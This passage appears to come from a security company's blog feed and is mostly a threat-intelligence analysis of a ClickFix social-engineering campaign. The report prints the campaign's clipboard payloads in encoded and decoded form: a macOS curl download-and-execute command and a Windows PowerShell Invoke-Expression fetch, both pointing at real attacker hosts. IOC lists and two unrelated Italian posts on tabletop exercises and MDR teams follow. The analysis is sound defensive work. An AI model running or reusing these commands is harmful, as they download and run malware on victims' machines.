                    window&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;location&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;href &lt;span class=&quot;token operator&quot;&gt;=&lt;/span&gt; &lt;span class=&quot;token string&quot;&gt;&apos;uri.html&apos;&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;;&lt;/span&gt;
                &lt;span class=&quot;token punctuation&quot;&gt;}&lt;/span&gt; &lt;span class=&quot;token keyword&quot;&gt;else&lt;/span&gt; &lt;span class=&quot;token keyword&quot;&gt;if&lt;/span&gt; &lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;os &lt;span class=&quot;token operator&quot;&gt;===&lt;/span&gt; &lt;span class=&quot;token string&quot;&gt;&apos;mac&apos;&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt; &lt;span class=&quot;token punctuation&quot;&gt;{&lt;/span&gt;
                    &lt;span class=&quot;token function&quot;&gt;createMacInstructionModal&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;;&lt;/span&gt;
                &lt;span class=&quot;token punctuation&quot;&gt;}&lt;/span&gt; &lt;span class=&quot;token keyword&quot;&gt;else&lt;/span&gt; &lt;span class=&quot;token punctuation&quot;&gt;{&lt;/span&gt;
                    window&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;location&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;href &lt;span class=&quot;token operator&quot;&gt;=&lt;/span&gt; &lt;span class=&quot;token string&quot;&gt;&apos;/&apos;&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;;&lt;/span&gt;
                &lt;span class=&quot;token punctuation&quot;&gt;}&lt;/span&gt;
            &lt;span class=&quot;token punctuation&quot;&gt;}&lt;/span&gt;
        &lt;span class=&quot;token punctuation&quot;&gt;}&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;;&lt;/span&gt;
    &lt;span class=&quot;token punctuation&quot;&gt;}&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;Notice the code comment in Russian language, meaning &quot;Alternative approach – intercepting the form submission event.&quot; Near this comment we can find other russian comments saying things like &quot;Additional click handler&quot;, &quot;Run both approaches for reliability.&quot;, &quot;Add the Booking.com header as in the example&quot; and &quot;Function to create a modal window with instructions for Mac (as in the example)&quot;. This is a clear indicator of usage of LLM in writing the webpage and of a debug and improvement cycle during the development.&lt;/p&gt;
&lt;p&gt;This particular page seems to target also MacOS users by copying this string in their clipboard, ready to be executed.&lt;/p&gt;
&lt;div class=&quot;gatsby-highlight&quot; data-language=&quot;bash&quot;&gt;&lt;pre class=&quot;language-bash&quot;&gt;&lt;code class=&quot;language-bash&quot;&gt;&lt;span class=&quot;token builtin class-name&quot;&gt;echo&lt;/span&gt; &lt;span class=&quot;token punctuation&quot;&gt;\&lt;/span&gt;&apos;ZWNobyAnVmVyaWZpY2F0aW9uIHBsZWFzZSB3YWl0Li4uJyAmJiBjdXJsIC1zIC1rICdodHRwczovL2RlZmF1bHRnYXRlLnNwYWNlL2N1cmwvMzVkNGRkNzc3MTkxNjkxZWY0OWMxNjNlYTBlMjJkYTZjMjAwYjU3YzMwYzA1OTc4YmU3YWJmNmRlMGE0MDU2YScgLW8gL3RtcC9sYXVuY2ggJiYgY2htb2QgK3ggL3RtcC9sYXVuY2ggJiYgL3RtcC9sYXVuY2g&lt;span class=&quot;token operator&quot;&gt;=&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;\&lt;/span&gt;&apos; &lt;span class=&quot;token operator&quot;&gt;|&lt;/span&gt; base64 &lt;span class=&quot;token parameter variable&quot;&gt;-d&lt;/span&gt; &lt;span class=&quot;token operator&quot;&gt;|&lt;/span&gt; &lt;span class=&quot;token function&quot;&gt;bash&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;Decoded into&lt;/p&gt;
&lt;div class=&quot;gatsby-highlight&quot; data-language=&quot;bash&quot;&gt;&lt;pre class=&quot;language-bash&quot;&gt;&lt;code class=&quot;language-bash&quot;&gt;&lt;span class=&quot;token builtin class-name&quot;&gt;echo&lt;/span&gt; &lt;span class=&quot;token string&quot;&gt;&apos;Verification please wait...&apos;&lt;/span&gt; &lt;span class=&quot;token operator&quot;&gt;&amp;amp;&amp;amp;&lt;/span&gt; &lt;span class=&quot;token function&quot;&gt;curl&lt;/span&gt; &lt;span class=&quot;token parameter variable&quot;&gt;-s&lt;/span&gt; &lt;span class=&quot;token parameter variable&quot;&gt;-k&lt;/span&gt; &lt;span class=&quot;token string&quot;&gt;&apos;https://defaultgate.space/curl/35d4dd777191691ef49c163ea0e22da6c200b57c30c05978be7abf6de0a4056a&apos;&lt;/span&gt; &lt;span class=&quot;token parameter variable&quot;&gt;-o&lt;/span&gt; /tmp/launch &lt;span class=&quot;token operator&quot;&gt;&amp;amp;&amp;amp;&lt;/span&gt; &lt;span class=&quot;token function&quot;&gt;chmod&lt;/span&gt; +x /tmp/launch &lt;span class=&quot;token operator&quot;&gt;&amp;amp;&amp;amp;&lt;/span&gt; /tmp/launch&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;If the page is being navigated from a Windows machine, the payload that gets copied is&lt;/p&gt;
&lt;div class=&quot;gatsby-highlight&quot; data-language=&quot;powershell&quot;&gt;&lt;pre class=&quot;language-powershell&quot;&gt;&lt;code class=&quot;language-powershell&quot;&gt;powershell &lt;span class=&quot;token operator&quot;&gt;-&lt;/span&gt;wi &lt;span class=&quot;token function&quot;&gt;mi&lt;/span&gt; &lt;span class=&quot;token operator&quot;&gt;-&lt;/span&gt;Enc LgAnAEkAbgB2AG8AawBlAC0ARQB4AHAAcgBlAHMAcwBpAG8AbgAnACgAdwBnAGUAdAAgAC0AdQBzAGUAYgBhAHMAaQBjACAAaAB0AHQAcABzADoALwAvAGoAcQBxAGkAYwBlAC4AYwBvAG0ALwBtAC4AdAB4AHQAKQAuAEMAbwBuAHQAZQBuAHQA&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;Decoded into&lt;/p&gt;
&lt;div class=&quot;gatsby-highlight&quot; data-language=&quot;powershell&quot;&gt;&lt;pre class=&quot;language-powershell&quot;&gt;&lt;code class=&quot;language-powershell&quot;&gt;&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;&lt;span class=&quot;token string&quot;&gt;&apos;Invoke-Expression&apos;&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;wget &lt;span class=&quot;token operator&quot;&gt;-&lt;/span&gt;usebasic https:&lt;span class=&quot;token operator&quot;&gt;/&lt;/span&gt;&lt;span class=&quot;token operator&quot;&gt;/&lt;/span&gt;jqqice&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;com/m&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;txt&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;Content&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;Unluckily, at the time of writing the both pages has been taken down, so we can&apos;t confirm what was going to be downloaded on victim machines.&lt;/p&gt;
&lt;h3&gt;IOCs&lt;/h3&gt;
&lt;p&gt;At the end of our investigation, the Certego Threat Intelligence Team identified a set of Indicators of Compromise (IOCs) associated with the ClickFix operation observed in recent weeks. These artifacts include malicious file hashes, URLs used to deliver the payloads, and IP addresses linked to the campaign’s infrastructure.&lt;/p&gt;
&lt;h4&gt;Hashes&lt;/h4&gt;
&lt;div class=&quot;gatsby-highlight&quot; data-language=&quot;text&quot;&gt;&lt;pre class=&quot;language-text&quot;&gt;&lt;code class=&quot;language-text&quot;&gt;8986d305ceed84c8dbc430ae7caf31b645f22fe5c4c29bca869eaee9abc46585  BMUAUFKZ.msi
dab70bc2d883a287e4dc3c468dc98ced3eccd19c14fc267c1979613f721632b3  index.txt
086d9294348d95feb9f740db515f9708d2ab76cfa15815b7c7f79122932900de  j.txt
ba8f2313b3398187c424d9abed5f735907d01ebc9a11077136d2919e369501d6  MRXTOHRL.msi
0ccf7e387d851eb26bbc7d1895dab427d9cc392916523f5d06ba64a16fdbd616  uri.html

fbb7ca141535f13ca986f27d93151bc224dfece1ec2100bbab0a943b69a19aec  DWKNANVH.msi&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;
&lt;h4&gt;URL&lt;/h4&gt;
&lt;div class=&quot;gatsby-highlight&quot; data-language=&quot;text&quot;&gt;&lt;pre class=&quot;language-text&quot;&gt;&lt;code class=&quot;language-text&quot;&gt;hxxps[:]//kjarz.[com/uri.html
hxxps[:]//kjarz.[com/j.txt
hxxps[:]//kjarz.[com/MRXTOHRL.msi
hxxps[:]//kjarz.[com/BMUAUFKZ.msi

hxxps[:]//account-captcha-id4234[.cfd/uri.html
hxxps[:]//77.90.60.32/j.txt
hxxps[:]//kirgr[.com/DWKNANVH.msi
hxxps[:]//account-bookscaptcha[.com/uri.html
hxxps[:]//account-bookextranet[.icu/uri.html
hxxps[:]//account-bookcaptcha[.com/uri.html
hxxps[:]//account-bookcaptcha[.cfd/uri.html
hxxps[:]//account-extranetcaptchapulse[.com/uri.html
https[:]//account-extranetpulser[.com/uri.html
hxxps[:]//account-extrapulse[.cfd/uri.html
hxxps[:]//icejqq[.com/jj.txt
hxxps[:]//icejqq[.com/j.txt

hxxps[:]//account-extracaptcha[.com/uri.html
hxxps[:]//defaultgate[.space/curl/35d4dd777191691ef49c163ea0e22da6c200b57c30c05978be7abf6de0a4056a  # MacOS-specific payload
hxxps[:]//jqqice[.com/m.txt  # Windows-specific payload&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;
&lt;h4&gt;IP&lt;/h4&gt;
&lt;div class=&quot;gatsby-highlight&quot; data-language=&quot;text&quot;&gt;&lt;pre class=&quot;language-text&quot;&gt;&lt;code class=&quot;language-text&quot;&gt;88.214.50.121 # Hosting IP
212.11.64.95  # HijackLoader C2&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;
&lt;h3&gt;Conclusions&lt;/h3&gt;
&lt;p&gt;The ClickFix campaign analyzed in recent weeks once again demonstrates how threat actors continue to invest in social-engineering techniques that are simple yet highly effective, capable of targeting both Windows and macOS users through increasingly polished deception mechanisms. The elements uncovered — new infrastructure, OS-specific payloads, and clear iterative development patterns — indicate that this operation remains active and continuously evolving.&lt;/p&gt;
&lt;p&gt;At Certego, we will continue to closely monitor this and other related campaigns, constantly expanding our visibility and updating our detection capabilities to promptly identify any new variants or infrastructure leveraged by the threat actor. Any significant developments will be shared through our Threat Intelligence channels and on the company blog.&lt;/p&gt;</content:encoded></item><item><title><![CDATA[Certego a Sky TG24]]></title><description><![CDATA[Uno sguardo dentro il nostro lavoro quotidiano]]></description><link>https://www.certego.net/blog/certego-a-skytg24/</link><guid isPermaLink="false">certego-a-skytg24</guid><category><![CDATA[Blog]]></category><category><![CDATA[Cybersecurity]]></category><dc:creator><![CDATA[Pier Giorgio Bergonzi, Product Marketing]]></dc:creator><pubDate>Sun, 07 Dec 2025 23:00:00 GMT</pubDate><content:encoded>&lt;p&gt;Domenica 7 dicembre siamo stati protagonisti di Progress, il programma di Sky TG24 dedicato all’innovazione, alla tecnologia e alla trasformazione digitale. &lt;a href=&quot;https://video.sky.it/news/tecnologia/playlist/progress-3697&quot;&gt;Al minuto 24:15 del programma, disponibile a questo link&lt;/a&gt;, abbiamo avuto l’occasione di raccontare davanti alle telecamere ciò che ogni giorno facciamo dietro le quinte: proteggere aziende e infrastrutture dagli attacchi informatici, in un contesto in cui la rapidità e la precisione della risposta fanno la differenza.&lt;/p&gt;
&lt;p&gt;A intervenire ai microfoni di Giovanni Mirenna sono stati Bernardino Grignaffini Gregorio, CEO e CO-Founder di Certego, e Marco Giovanetti, Security Operations Manager di Certego, che hanno illustrato il cuore del nostro modello di cybersecurity: un approccio che unisce competenze specialistiche, esperienza operativa e tecnologie proprietarie sviluppate internamente.&lt;/p&gt;
&lt;p&gt;Condividere la nostra visione in un contesto autorevole come Sky TG24 rappresenta un riconoscimento concreto dell’impegno che ogni giorno dedichiamo alla protezione del sistema produttivo del Paese.&lt;/p&gt;</content:encoded></item><item><title><![CDATA[Allenarsi alla crisi]]></title><description><![CDATA[Il valore del tabletop nella cybersecurity]]></description><link>https://www.certego.net/blog/il-valore-del-tabletop-nella-cybersecurity/</link><guid isPermaLink="false">il-valore-del-tabletop-nella-cybersecurity</guid><category><![CDATA[Blog]]></category><category><![CDATA[Cybersecurity]]></category><dc:creator><![CDATA[Pier Giorgio Bergonzi, Product Marketing]]></dc:creator><pubDate>Mon, 17 Nov 2025 23:00:00 GMT</pubDate><content:encoded>&lt;h2&gt;Perché oggi un esercizio tabletop di cybersecurity?&lt;/h2&gt;
&lt;p&gt;Nel panorama attuale, gli attacchi informatici non sono più eventi rari o circoscritti a pochi settori: sono costanti, evoluti e mettono in discussione non solo le difese tecniche, ma anche i processi, la comunicazione e i ruoli aziendali.
Per questo motivo, sempre più &lt;strong&gt;CISO, IT Manager e responsabili della sicurezza informatica di diversi settori&lt;/strong&gt; scelgono di mettersi alla prova insieme, partecipando a esercizi di tipo tabletop per confrontarsi su come affrontare un incidente informatico, condividere esperienze e imparare dagli approcci di chi opera in contesti diversi.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;Un tabletop è una simulazione di scenario&lt;/strong&gt;: si parte da un attacco ipotetico — un ransomware, una compromissione della supply chain, una fuga di dati — e si analizzano passo dopo passo le decisioni da prendere. È un momento in cui professionisti che condividono lo stesso ruolo, ma lavorano in settori diversi, si siedono allo stesso tavolo e si chiedono: _ &lt;em&gt;“Cosa faremmo se capitasse a noi? Chi chiameremmo? Come gestiremmo la comunicazione? Chi decide cosa, e quando?”&lt;/em&gt; _&lt;/p&gt;
&lt;p&gt;In questo confronto tra pari, ma con esperienze e prospettive differenti, nasce il valore più grande dell’esercizio: la possibilità di osservare come altri, con le stesse responsabilità, affrontano problemi simili da angolazioni diverse.&lt;/p&gt;
&lt;p&gt;Questo tipo di esercizio è ormai riconosciuto come una &lt;strong&gt;pratica fondamentale di resilienza operativa&lt;/strong&gt;: la Digital Operational Resilience Act (DORA) lo cita come strumento per testare la capacità di risposta agli incidenti.&lt;/p&gt;
&lt;p&gt;Ma, al di là del riferimento normativo, per chi guida la sicurezza in azienda un tabletop è soprattutto un’opportunità: passare dal “abbiamo un piano scritto” al “abbiamo messo quel piano alla prova, lo abbiamo discusso, abbiamo scoperto nuovi spunti e idee”.
Ed è proprio dal confronto con gli altri — con chi vive le stesse responsabilità ma in contesti diversi — che emergono le intuizioni più utili. Perché spesso &lt;strong&gt;non si tratta solo di sapere cosa fare, ma di capire come gli altri prendono decisioni sotto pressione&lt;/strong&gt;.
&lt;br&gt;
&lt;/br&gt;&lt;/p&gt;
&lt;h2&gt;Un’occasione di formazione “reale”&lt;/h2&gt;
&lt;p&gt;Partecipare a un tabletop non è un esercizio teorico: è una vera &lt;strong&gt;esperienza di formazione sul campo&lt;/strong&gt;.
Ogni partecipante porta con sé il proprio bagaglio tecnico e decisionale, ma viene messo nella condizione di &lt;strong&gt;confrontarsi con chi svolge lo stesso ruolo in altri settori&lt;/strong&gt;, magari con vincoli, processi e risorse completamente diversi. È un confronto tra pari livello, ma con esperienze differenti: chi lavora nella manifattura ragiona in termini di continuità operativa, chi opera nel finance mette al centro la compliance, chi lavora nell’healthcare dà priorità alla protezione dei dati personali.&lt;/p&gt;
&lt;p&gt;Questo scambio di prospettive genera apprendimento concreto.
Ci si accorge che le sfide possono essere comuni, ma le risposte cambiano in base al contesto.
E proprio in questa varietà si trovano idee, approcci e soluzioni che possono essere adattati alla propria realtà.
Il tabletop, in questo senso, diventa un &lt;strong&gt;laboratorio di contaminazione positiva&lt;/strong&gt;: un luogo in cui si mettono alla prova procedure e persone, ma anche un’occasione per ampliare la visione di cosa significa gestire una crisi informatica.&lt;/p&gt;
&lt;p&gt;Ogni partecipante esce dall’esperienza con qualcosa di nuovo: una consapevolezza, una domanda, un’intuizione. È formazione esperienziale nel senso più autentico: non si impara leggendo o ascoltando, ma facendo, discutendo, condividendo.
&lt;br&gt;
&lt;/br&gt;&lt;/p&gt;
&lt;h2&gt;Cosa ti porti a casa dopo averlo fatto&lt;/h2&gt;
&lt;p&gt;Un tabletop non si chiude quando termina la simulazione: è da quel momento che inizia il vero valore.
Il giorno dopo, se sei un CISO o un IT Manager, torni in ufficio con una prospettiva più ampia, arricchita dal confronto con chi vive le tue stesse responsabilità in contesti diversi.
Non si tratta di scoprire errori o mancanze, ma di &lt;strong&gt;guardare la tua esperienza da un’altra prospettiva&lt;/strong&gt;, mettendo in discussione le abitudini e rileggendo i tuoi processi alla luce di nuove idee.&lt;/p&gt;
&lt;p&gt;Quello che hai ascoltato dai tuoi colleghi di altri settori ti aiuta a misurare la tua maturità, a individuare spazi di miglioramento e a trovare nuove modalità per rendere la tua organizzazione più pronta e più coordinata.
Scopri che molte difficoltà sono comuni — la gestione dei tempi, la chiarezza dei ruoli, la comunicazione interna — e che alcune soluzioni semplici possono davvero fare la differenza.
In questo modo, il tabletop smette di essere una simulazione e diventa &lt;strong&gt;uno strumento concreto di crescita professionale e di sviluppo della leadership&lt;/strong&gt;.&lt;/p&gt;
&lt;p&gt;Confrontarsi con altri CISO e responsabili della sicurezza significa anche imparare a pensare in modo più strategico.
Si comprendono meglio le priorità, le dinamiche decisionali, la gestione della pressione e dell’incertezza.
È un esercizio che allena non solo la prontezza tecnica, ma la capacità di costruire fiducia, coordinamento e collaborazione.
La sicurezza, dopo un tabletop, appare meno come un insieme di procedure e più come un ecosistema di persone e relazioni.
&lt;br&gt;
&lt;/br&gt;&lt;/p&gt;
&lt;h2&gt;Dal gioco alla realtà&lt;/h2&gt;
&lt;p&gt;Il tabletop è spesso descritto come un “gioco di ruolo”, e in parte lo è: si parte da uno scenario, si discutono decisioni, si reagisce a sviluppi imprevisti.
Ma è un gioco estremamente serio, perché prepara alla realtà.
Durante la simulazione, un facilitatore — il game master — guida la sessione, introduce nuovi eventi (“injects”) e stimola i partecipanti a decidere in gruppo.
&lt;strong&gt;I team vengono divisi in tavoli di lavoro e si trovano a valutare insieme come reagire&lt;/strong&gt;.
Alla fine, si confrontano i risultati, si discutono le scelte e si riflette su come ciascuno ha gestito la crisi.&lt;/p&gt;
&lt;p&gt;È un’esperienza dinamica e coinvolgente che permette di &lt;strong&gt;allenarsi a decidere meglio prima che arrivi il momento di farlo davvero&lt;/strong&gt;.
E quando ci si trova di fronte a una vera emergenza, quell’esperienza condivisa — la memoria delle decisioni prese insieme — diventa un vantaggio competitivo.
&lt;br&gt;
&lt;/br&gt;&lt;/p&gt;
&lt;h2&gt;In conclusione&lt;/h2&gt;
&lt;p&gt;Un tabletop di cybersecurity non serve solo a testare procedure o piani di risposta: &lt;strong&gt;è un acceleratore di maturità organizzativa e professionale&lt;/strong&gt;.
È l’occasione per confrontarsi con pari ruolo, condividere esperienze, mettere in discussione convinzioni e migliorare concretamente la propria capacità di gestire una crisi.&lt;/p&gt;
&lt;p&gt;È un momento di scambio, di apprendimento reciproco e di crescita collettiva — dove ogni partecipante si mette alla prova e, nel farlo, arricchisce anche gli altri.
Perché, in fondo, la vera forza della sicurezza non sta solo nelle tecnologie, ma nella &lt;strong&gt;capacità delle persone di decidere insieme&lt;/strong&gt;, con lucidità e fiducia, quando il tempo stringe e le certezze vacillano.&lt;/p&gt;</content:encoded></item><item><title><![CDATA[Il fattore umano nell’MDR]]></title><description><![CDATA[Come valutare se il team che ti protegge è davvero esperto]]></description><link>https://www.certego.net/blog/il-fattore-umano-nell-mdr-come-valutare/</link><guid isPermaLink="false">il-fattore-umano-nell-mdr-come-valutare</guid><category><![CDATA[Blog]]></category><category><![CDATA[Cybersecurity]]></category><dc:creator><![CDATA[Pier Giorgio Bergonzi, Product Marketing]]></dc:creator><pubDate>Mon, 10 Nov 2025 23:00:00 GMT</pubDate><content:encoded>&lt;p&gt;Quando si parla di servizi di &lt;strong&gt;Managed Detection and Response&lt;/strong&gt; (MDR), è naturale pensare subito alla componente tecnologica: piattaforme di analisi avanzata, motori di correlazione, algoritmi e integrazioni con sistemi EDR, SIEM o NDR. Ed è comprensibile: la tecnologia rappresenta la base operativa che consente di rilevare, analizzare e rispondere in tempo reale alle minacce, ma anche lo strumento che ottimizza il lavoro dei team di sicurezza, rendendo i processi più efficaci ed efficienti.&lt;/p&gt;
&lt;p&gt;Ma — e questo è un “ma” importante — &lt;strong&gt;la tecnologia&lt;/strong&gt;, per quanto sofisticata, &lt;strong&gt;da sola non basta&lt;/strong&gt;. Senza l’intuito, l’esperienza e la capacità di giudizio delle persone, anche le piattaforme più avanzate rischiano di restituire solo dati, non risposte.&lt;/p&gt;
&lt;p&gt;Un servizio MDR è davvero efficace quando il valore delle tecnologie è affiancato da un team di professionisti esperti, capace di interpretare i segnali, distinguere un falso positivo da un attacco reale e prendere decisioni tempestive nei momenti critici.
In definitiva, l’MDR migliore è quello in cui l’intelligenza delle tecnologie  incontra la competenza delle menti più preparate.
&lt;br&gt;
&lt;/br&gt;&lt;/p&gt;
&lt;h2&gt;Esperienza: anni vissuti sul campo, non solo di servizi&lt;/h2&gt;
&lt;p&gt;Nel mondo della cybersecurity, &lt;strong&gt;l’esperienza non è un numero: è un patrimonio&lt;/strong&gt;.&lt;/p&gt;
&lt;p&gt;Un &lt;strong&gt;SecOps team&lt;/strong&gt; che opera da anni nel campo ha affrontato attacchi reali di natura diversa: ransomware, intrusioni APT, compromissioni cloud, data breach, etc. Ha imparato a riconoscere schemi ricorrenti, a creare playbook di risposta e ha sviluppato la sensibilità per individuare ciò che ancora non è documentato.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;Più anni di attività significano anche maggiore esposizione alla ricerca di nuove minacce&lt;/strong&gt;: analisi di malware emergenti, reverse engineering di payload sconosciuti, studio di nuove tecniche di evasione e persistence, osservazione dei comportamenti dei cybercriminali e adattamento continuo delle strategie di difesa. Tutto questo forma un bagaglio di conoscenze che nessun software può sostituire.&lt;/p&gt;
&lt;p&gt;Quando valuti un provider MDR analizza la struttura e la maturità del suo Security Operations Team. Chiediti &lt;strong&gt;da quante persone è composto il team, quante di queste hanno un profilo senior o specialistico e quante ore-uomo di analisi vengono gestite ogni&lt;/strong&gt;.
Un altro indicatore importante è il numero di &lt;strong&gt;incidenti reali affrontati e risolti e la capacità di eseguire post-incident review&lt;/strong&gt;, perché ogni esperienza sul campo contribuisce ad affinare la capacità di risposta e a migliorare i processi interni.
&lt;br&gt;
&lt;/br&gt;&lt;/p&gt;
&lt;div align=&quot;center&quot;&gt;
  &lt;a href=&quot;https://www.certego.net/blog/mdr-su-misura-quando-le-tecnologie-proprietarie-fanno-la-differenza/&quot;&gt;
    &lt;span class=&quot;gatsby-resp-image-wrapper&quot; style=&quot;position: relative; display: block; margin-left: auto; margin-right: auto; max-width: 1536px; &quot;&gt;
      &lt;span class=&quot;gatsby-resp-image-background-image&quot; style=&quot;padding-bottom: 50%; position: relative; bottom: 0; left: 0; background-image: url(&apos;data:image/jpeg;base64,/9j/2wBDABALDA4MChAODQ4SERATGCgaGBYWGDEjJR0oOjM9PDkzODdASFxOQERXRTc4UG1RV19iZ2hnPk1xeXBkeFxlZ2P/2wBDARESEhgVGC8aGi9jQjhCY2NjY2NjY2NjY2NjY2NjY2NjY2NjY2NjY2NjY2NjY2NjY2NjY2NjY2NjY2NjY2NjY2P/wgARCAAKABQDASIAAhEBAxEB/8QAGAAAAwEBAAAAAAAAAAAAAAAAAAMEAgX/xAAVAQEBAAAAAAAAAAAAAAAAAAAAAf/aAAwDAQACEAMQAAAB6sztIomD/8QAGhABAQACAwAAAAAAAAAAAAAAAgEAAyEyQf/aAAgBAQABBQL3ekHN5uHs+QJM/8QAFBEBAAAAAAAAAAAAAAAAAAAAEP/aAAgBAwEBPwE//8QAFBEBAAAAAAAAAAAAAAAAAAAAEP/aAAgBAgEBPwE//8QAGhAAAgIDAAAAAAAAAAAAAAAAAAECQRAhMf/aAAgBAQAGPwIg1y8MY9Wf/8QAGhAAAwEAAwAAAAAAAAAAAAAAAREhABBRcf/aAAgBAQABPyEMFM0qTjCGcEAwAfcnC9N//9oADAMBAAIAAwAAABAsH//EABURAQEAAAAAAAAAAAAAAAAAABAR/9oACAEDAQE/EIf/xAAVEQEBAAAAAAAAAAAAAAAAAAAAAf/aAAgBAgEBPxCo/8QAGxABAAMBAAMAAAAAAAAAAAAAAQARITFBUfD/2gAIAQEAAT8QKha31BxdUmnjpCsNqje/1wYINoXsvW6K01yf/9k=&apos;); background-size: cover; display: block;&quot;&gt;&lt;/span&gt;
  &lt;img class=&quot;gatsby-resp-image-image&quot; alt=&quot;Cybersecurity su misura2&quot; title=&quot;&quot; src=&quot;/website/static/4c98b8f7748e23b757fa3196f52d9a1d/ac99c/Cybersecurity%20su%20misura2.jpg&quot; srcset=&quot;/website/static/4c98b8f7748e23b757fa3196f52d9a1d/4ecad/Cybersecurity%20su%20misura2.jpg 384w,
/website/static/4c98b8f7748e23b757fa3196f52d9a1d/212bf/Cybersecurity%20su%20misura2.jpg 768w,
/website/static/4c98b8f7748e23b757fa3196f52d9a1d/ac99c/Cybersecurity%20su%20misura2.jpg 1536w,
/website/static/4c98b8f7748e23b757fa3196f52d9a1d/e1596/Cybersecurity%20su%20misura2.jpg 2048w&quot; sizes=&quot;(max-width: 1536px) 100vw, 1536px&quot; style=&quot;width:100%;height:100%;margin:0;vertical-align:middle;position:absolute;top:0;left:0;&quot; loading=&quot;lazy&quot; decoding=&quot;async&quot;&gt;
    &lt;/span&gt;
  &lt;/a&gt;
&lt;/div&gt;
&lt;br&gt;
&lt;br&gt;
&lt;h2&gt;Certificazioni: la garanzia di competenze verificate&lt;/h2&gt;
&lt;p&gt;Le certificazioni internazionali sono un segnale tangibile di qualità.
Non si tratta solo di “bollini”, ma di &lt;strong&gt;attestazioni ottenute attraverso percorsi rigorosi di formazione, verifica e aggiornamento continuo&lt;/strong&gt;.
Un team di Security Operations ben strutturato dovrebbe annoverare tra le proprie competenze alcune delle certificazioni più riconosciute nel settore, come ad esempio:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;&lt;strong&gt;ISC2 Certified Information Systems Security Professional (CISSP)&lt;/strong&gt;&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;GIAC Cloud Security Automation (GCSA)&lt;/strong&gt;&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;GIAC Exploit Researcher and Advanced Penetration Tester (GXPN)&lt;/strong&gt;&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;GIAC Penetration Tester (GPEN)&lt;/strong&gt;&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;ISECOM OSSTMM Professional Security Tester (OPST)&lt;/strong&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;Quando valuti un provider MDR, &lt;strong&gt;chiedi quanto investe nella formazione del proprio team&lt;/strong&gt;:
quante ore-uomo vengono dedicate ogni anno all’aggiornamento professionale, quante certificazioni vengono conseguite o rinnovate, e come viene monitorata la crescita delle competenze interne.&lt;/p&gt;
&lt;p&gt;Verifica anche se l’azienda segue &lt;strong&gt;framework di riferimento come MITRE ATT&amp;#x26;CK, NIST&lt;/strong&gt; o ISO 27035 nei processi di detection e incident response.&lt;/p&gt;
&lt;p&gt;Un provider MDR che investe costantemente in questo ambito dimostra una cosa fondamentale: &lt;strong&gt;la sicurezza è una cultura, non solo un servizio&lt;/strong&gt;.
&lt;br&gt;
&lt;/br&gt;&lt;/p&gt;
&lt;h2&gt;Diversi ruoli e competenze: la forza di un team eterogeneo&lt;/h2&gt;
&lt;p&gt;Un Security Operations Center (SOC) efficace non è composto solo da analisti di cybersecurity.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;Le minacce moderne richiedono un mix di competenze complementari, in grado di coprire ogni fase della catena d’attacco&lt;/strong&gt; — dalla prevenzione alla risposta, fino all’analisi post-evento — supportate da una consulenza continua che accompagna il cliente nel miglioramento e nell’adattamento costante delle difese, oltre che nella piena valorizzazione del servizio.&lt;/p&gt;
&lt;p&gt;Oltre agli analisti di primo e secondo livello, un team di Security Operations dovrebbe includere:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;&lt;strong&gt;Incident Responder&lt;/strong&gt;, in grado di coordinare e contenere un attacco attivo, gestendo la crisi con tempestività;&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Threat Researcher&lt;/strong&gt;, che studiano nuove campagne malevole, creano signature di detection e aggiornano costantemente i playbook;&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Digital Forensic Analyst&lt;/strong&gt;, specializzati nell’individuare tracce digitali, analizzare artefatti di memoria e ricostruire la dinamica di un attacco;&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Detection Engineer&lt;/strong&gt;, che sviluppano regole di correlazione, alert tuning e automazioni nei sistemi EDR e SOAR per ridurre i falsi positivi;&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Threat Hunter&lt;/strong&gt;, che non aspettano gli alert, ma li anticipano cercando indicatori di compromissione (IOC) e comportamenti anomali all’interno dei sistemi aziendali.&lt;/li&gt;
